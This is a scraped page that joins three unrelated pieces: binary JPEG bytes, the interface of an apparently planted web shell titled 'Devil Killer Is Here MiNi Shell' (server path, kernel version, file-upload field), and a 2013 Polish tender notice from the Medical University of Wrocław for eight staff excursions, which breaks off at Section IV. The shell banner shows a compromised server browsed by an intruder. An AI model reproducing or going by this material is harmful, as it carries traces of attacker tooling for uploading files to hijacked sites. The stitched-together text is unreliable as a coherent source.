JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130326/119532-N-2013.html

<p class="kh_header"><b>Wrocław: UMW / AZ / PN - 22/13 Organizacja wycieczek dla pracowników, emerytów, rencistów Uniwersytetu Medycznego im. Piastów Śląskich we Wrocławiu oraz członków ich rodzin</b><br>
<b>Numer ogłoszenia: 119532 - 2013; data zamieszczenia: 26.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Medyczny im. Piastów Śląskich , ul. Pasteura 1, 50-367 Wrocław, woj. dolnośląskie, tel. 71 784 11 74; 784 11 73, faks 71 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UMW / AZ / PN - 22/13 Organizacja wycieczek dla pracowników, emerytów, rencistów Uniwersytetu Medycznego im. Piastów Śląskich we Wrocławiu oraz członków ich rodzin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-22/13 Organizacja wycieczek dla pracowników, emerytów, rencistów Uniwersytetu Medycznego im. Piastów Śląskich we Wrocławiu oraz członków ich rodzin. 
Przedmiot zamówienia jest podzielony na osiem części:
Część A 
Przedmiotem zamówienia jest organizacja wycieczki Paryż -Wersal -Luwr -Disneyland Montmarte, Plac Pigalle, Moulin Rouge, Łuk Triumfalny, Katedra Notre Dame, Pantheon, Rejs statkiem po Sekwanie, Wieża Eiffela, Pola Elizejskie, Muzeum D Orsay, (Disneyland dla chętnych uczestników z dziećmi) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 27 kwietnia - 3 maja 2013 r. 
(7 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem,
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 4 noclegi w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe-studio 2+2 lub 3 osobowe,
4. 4 śniadania wzmocnione,
5. 4 gorące obiadokolacje, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.

Część B 
Przedmiotem zamówienia jest organizacja wycieczki Białowieża - Hajnówka - Supraśl - Augustów, - Puńsk -Wigry -Druskienniki, Białowieski  Park Narodowy, Rezerwat  żubrów, Rejs statkiem Augustów - Przewięź-Studzieniczna, Wigierski Park Narodowy, pobyt w Parku wodnym w Druskiennikach dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 1 maja - 4 maja 2013 r.  (4 dni)  
a)  W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 3 noclegi w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 3 śniadania /szwedzki stół, kawa i herbata/,
5. 3 gorące obiadokolacje, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.

Część C
Przedmiotem zamówienia jest organizacja wycieczki Kraków - Zakopane -Dolina Kościeliska - Gubałówka - Nidzica - Czorsztyn - Basenytermalne   w  Białce Tatrzańskiej dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 29 maja - 1 czerwca 2013 r. (4 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 3 noclegi w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 -osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 3 śniadania /szwedzki stół, kawa i herbata/, 
5. 3 gorące obiadokolacje,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe, 
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.

Część D
Przedmiotem zamówienia jest organizacja wycieczki Hiszpania - Madryt - Toledo - Barcelona - Saragossa 2 dni wypoczynek na plażach Riwiery Hiszpańskiej (z noclegiem w trakcie przejazdu do Hiszpanii i w drodze powrotnej) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 5 lipca - 13 lipca 2013 r. (9 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 8 noclegów w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 8 śniadań /szwedzki stół, kawa i herbata/, 
5. 8 gorących obiadokolacji,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych, 
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.

Część E
Przedmiotem zamówienia jest organizacja wycieczki Kopenhaga - Sztokholm - Oslo - Lund - Malmo dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 12 sierpnia - 17 sierpnia 2013 r. (6 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 3 noclegi w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe, 1 nocleg na promie,
4. 4 śniadania /szwedzki stół, kawa i herbata/, w tym 1 na promie
5. 4 gorące obiadokolacje,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych, 
9. ubezpieczenie NNW i KL.
Liczba uczestników - 46 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.

Część F
Przedmiotem zamówienia jest organizacja wycieczki Grecja - Ateny - Kalambaki - Meteory - Peloponez - Korynt - Mykeny, Nafplio - Riwiera Olimpijska - Nei Pori 2 dni wypoczynek na plażach (z noclegiem w trakcie przejazdu do Grecji i w drodze powrotnej) dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 15 sierpnia - 23 sierpnia 2013 r. (9 dni)  
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem, 
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 8 noclegów w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok. 2 osobowych, pozostałe - studio 2+2 lub 3 osobowe,
4. 8 śniadań /szwedzki stół, kawa i herbata/,
5. 8 gorących obiadokolacji,
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych, 
9. ubezpieczenie NNW i KL.
Liczba uczestników - 42 osoby (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.

Część G 
Przedmiotem zamówienia jest organizacja wycieczki Chorwacja - Zadar -Plitvickie Jeziora - Sibenik - Park Narodowy KRKA - Trogir - Split- Dubrovnik (2 dni plażowanie lub fakultatywnie we własnym zakresie rejsy na wyspy); noclegi środkowa Dalmacja dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 31 sierpnia - 8 września 2013 r. (9 dni)
a) W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem,
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 6 noclegów w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok.2 osobowych, pozostałe-studio 2+2 lub 3 osobowe,
4. 6 śniadań /szwedzki stół, kawa i herbata/,
5. 6 gorących obiadokolacji, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c) Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d) Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.
  
Część H 
Przedmiotem zamówienia jest organizacja wycieczki Wiedeń - Ołomuniec - Brno
Schonbrunn, Hofburg, Kahlenberg, Graben- Kolumna Morowa, Opera Wiedeńska, Krypta cesarska Habsburgów, Katedra Św. Stefana dla pracowników, emerytów, rencistów Uniwersytetu Medycznego we Wrocławiu oraz członków ich rodzin w terminie 5 września - 7 września 2013 r. (3 dni). Noclegi  w Wiedniu lub  okolicy do 15 km
a)  W cenie należy zawrzeć następujące świadczenia:
1. Przejazd nowym (max. 7 letnim) komfortowym autokarem,
2. Realizacja programu zawartego w ofercie (w programie należy także podać godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie),
3. 2 noclegi w hotelach min. dwóch gwiazdek lub pensjonatach o standardzie min. trzech gwiazdek, w pokojach z pełnym węzłem sanitarnym minimum 70% pok.2 osobowych, pozostałe-studio 2+2 lub 3 osobowe,
4. 2 śniadania /szwedzki stół, kawa i herbata/,
5. 2 gorące obiadokolacje, 
6. opieka pilota i przewodnika miejscowego,
7. opłaty drogowe, parkingowe, wjazdowe,
8. koszty rezerwacji grupowych,
9. ubezpieczenie NNW i KL.
Liczba uczestników - 45 osób (+/- 5 osób).
b) Zamawiający poda dokładną liczbę zgłoszeń na wycieczkę w terminie min. 10 dni przed rozpoczęciem wycieczki.
c)  Po upływie terminu określenia liczby uczestników Wykonawca zobowiązany jest do przyjmowania dodatkowych zgłoszeń uczestników w miarę posiadania wolnych miejsc na wycieczce.
d)  Zamawiający zobowiązuje się do uregulowania należności za zamówioną ilość miejsc, po zakończeniu wycieczki, przelewem w ciągu 7 dni roboczych od daty otrzymania faktury VAT Wykonawcy i potwierdzenia na niej zgodności z zamówieniem przez Zamawiającego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium w postępowaniu UMW/AZ/PN-22/13</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wpis do rejestru organizatorów turystyki i pośredników turystycznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (wzór - załącznik nr 7 do Siwz), oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;
Dowodami, o których mowa powyżej są:
a) Poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b) W przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, 
o którym mowa w ppkt a.
Wykonawca spełnia warunek, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub w wypadku świadczeń ciągłych lub okresowych - wykonuje min. 3 usługi dotyczące organizacji wycieczek dla co najmniej 30 osób.
Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1A, 1B, 1C, 1D,1E, 1F, 1G, 1H - Formularz ofertowy z ceną ofertową jego realizacji netto i brutto uwzględniającą ustalone przez Zamawiającego warunki (wzór -  załącznik nr 1A, 1B, 1C, 1D,1E, 1F, 1G, 1H do Siwz);
Załącznik nr 6 - zawierający pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają one z przepisów prawa lub innych dokumentów złożonych w ofercie; (załącznik przygotowywany przez wykonawcę);
Załącznik nr 9 - program wycieczki; w programie należy podać również godziny wyjazdu i powrotu oraz ceny biletów wstępu do poszczególnych obiektów - kieszonkowe, niepodlegające ocenie; (załącznik przygotowywany przez wykonawcę);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
